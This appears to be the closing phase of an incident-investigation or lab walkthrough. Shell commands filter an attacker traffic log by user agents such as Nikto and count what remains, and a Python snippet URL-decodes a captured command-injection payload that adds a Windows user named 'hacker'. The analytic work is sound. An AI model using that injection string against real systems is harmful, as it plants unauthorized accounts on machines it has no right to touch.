python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC
# ─── PHASE 9: VERIFY & CLOSE ──────────────────────────────────────────────────
grep "Nikto" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0" | wc -l
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0" \
| awk -F'"' '{print $6}' | sort | uniq -c | sort -rn
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0"
grep "192.168.199.2" access.log | tail -5

Subscribe To Our Newsletter
Join our mailing list to receive the latest news and updates from our team.
You have Successfully Subscribed!